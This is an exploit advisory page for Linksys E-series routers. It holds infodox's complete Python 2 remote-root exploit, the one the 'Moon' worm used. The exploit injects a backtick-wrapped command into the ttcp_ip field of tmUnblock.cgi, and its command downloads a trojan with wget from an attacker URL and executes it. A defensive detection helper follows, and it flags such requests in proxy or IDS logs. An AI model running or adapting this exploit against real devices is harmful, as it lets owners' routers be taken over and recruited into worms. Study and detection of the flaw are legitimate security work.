Linksys E-series Worm Remote Root

2014.02.18
Credit: infodox
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python2
"""
Linksys Remote Root Exploit
infodox - insecurety research

This is the exploit this "Moon" worm uses. Trivial blind cmd injection :)
This version crippled - uses wget.

Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
"""
import requests
import sys


def banner():
    print """\x1b[0;32m
.____    .__        __
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/      \/     \/      \/ \/         \/
You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)
\x1b[0m"""


def upShell(wget_url, target):
    """ This works with the normal busybox wget at least, and worked in testing"""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" % (wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"


def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    # The ttcp_ip field of tmUnblock.cgi reaches a shell unsanitised, so the
    # backtick-wrapped command is executed by the router (blind: no output).
    injection = "-h `%s`" % (command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '', 'change_action': '', 'action': '',
                  'commit': '0', 'ttcp_num': '2', 'ttcp_size': '2',
                  'ttcp_ip': injection, 'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)


def main(args):
    banner()
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" % (sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])


if __name__ == "__main__":
    main(sys.argv)
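The request the exploit sends has a fixed shape (a POST to tmUnblock.cgi whose ttcp_ip field is not an address but a backtick-wrapped command, plus a hard-coded User-Agent), which makes it easy to flag in HTTP access records from a router-facing proxy or IDS. The following Python 3 detection helper is an added example for this page, not part of the advisory or infodox's code; it assumes requests have already been parsed into (path, body, user_agent) tuples, and the sample records below are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Added detection example (not part of the advisory). Input records are
# assumed to be (request_path, urlencoded_post_body, user_agent) tuples.

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SHELL_META = set("`$;|&<>()\n")
# User-Agent hard-coded in the exploit above; a weak, secondary signal only.
EXPLOIT_UA = "Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]"


def is_tmunblock_injection(path, body, user_agent=""):
    """Return (flagged, reason) for one POST request.

    The legitimate ttcp_ip field holds a ping/ttcp target, so anything that is
    not a bare IPv4 address is suspicious, and shell metacharacters in it make
    the request a near-certain command-injection attempt.
    """
    if path.split("?", 1)[0].split("/")[-1] != "tmUnblock.cgi":
        return False, "not tmUnblock.cgi"
    params = parse_qs(body, keep_blank_values=True)
    for value in params.get("ttcp_ip", []):
        if IPV4_RE.match(value.strip()):
            continue
        if any(ch in SHELL_META for ch in value):
            return True, "ttcp_ip carries shell metacharacters: %r" % value
        return True, "ttcp_ip is not an IPv4 address: %r" % value
    if user_agent == EXPLOIT_UA:
        return True, "User-Agent matches the public exploit"
    return False, "nothing suspicious"


# Constructed sample records (not real traffic).
SAMPLE_REQUESTS = [
    # 0: the exploit's request shape, with a harmless command substituted
    ("/tmUnblock.cgi",
     "submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2"
     "&ttcp_ip=-h+%60id%60&StartEPI=1", EXPLOIT_UA),
    # 1: legitimate use of the diagnostic page
    ("/tmUnblock.cgi", "ttcp_num=2&ttcp_size=2&ttcp_ip=192.168.1.1&StartEPI=1",
     "Mozilla/5.0"),
    # 2: same parameter name on an unrelated path, ignored
    ("/index.html", "ttcp_ip=%60x%60", "Mozilla/5.0"),
    # 3: no metacharacters, but still not an address, so still flagged
    ("/tmUnblock.cgi?x=1", "ttcp_ip=-h+something", "curl/7.0"),
]


def scan(records):
    """Return (index, reason) for every flagged record, in order."""
    hits = []
    for idx, (path, body, ua) in enumerate(records):
        flagged, reason = is_tmunblock_injection(path, body, ua)
        if flagged:
            hits.append((idx, reason))
    return hits


if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_REQUESTS):
        print("request %d flagged: %s" % (idx, reason))
```

Matching on the parameter's expected type (an IPv4 literal) rather than on the exploit's exact payload is deliberate: it catches variants that swap the wget one-liner for anything else, while the User-Agent string only identifies this particular script.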

References:

http://cxsecurity.com/issue/WLB-2014020133
